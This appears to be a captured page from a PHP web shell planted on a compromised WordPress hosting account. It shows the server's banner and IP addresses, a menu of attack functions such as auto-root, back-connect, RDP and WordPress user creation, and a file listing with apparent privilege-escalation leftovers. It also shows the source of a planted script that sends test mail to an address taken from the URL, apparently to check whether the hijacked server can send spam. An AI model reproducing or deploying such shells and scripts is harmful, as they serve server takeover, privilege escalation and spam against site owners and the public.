Linux host11.registrar-servers.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Apache
: 198.54.126.139 | : 216.73.216.41
Cant Read [ /etc/named.conf ]
8.1.33
thebookpublishin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thebookpublishin /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.git__d7f3b3f__f8a6f5d
[ DIR ]
drw-r--r--
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
.well-known__f8a6f5d
[ DIR ]
drw-r--r--
6910c6
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
d4f0e
[ DIR ]
dr-xr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
1.13
KB
-r-xr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
index.php0
0
B
-rw-r--r--
p.php
2.85
KB
-rw-r--r--
robots.txt
488
B
-r--r--r--
t6wer-send.php
453
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : t6wer-send.php
<?php error_reporting(0); echo('T6werShop'); if (!empty($_GET['email'])) { if (!empty($_GET['email']) && trim($_GET['orderid']) != '') { $rand = trim($_GET['orderid']); } else { $rand = rand(); } mail(trim($_GET['email']),$_SERVER['HTTP_HOST']." - Sending is Working Fine. [Result] ID: (".$rand.")","T6wer Shop [Sending test]."); echo '<b>Send an report to ['.$_GET['email'].'] - ID: '.$rand.'</b>'; echo '<!-- <id>'.$rand.'</id> -->'; } ?>
Close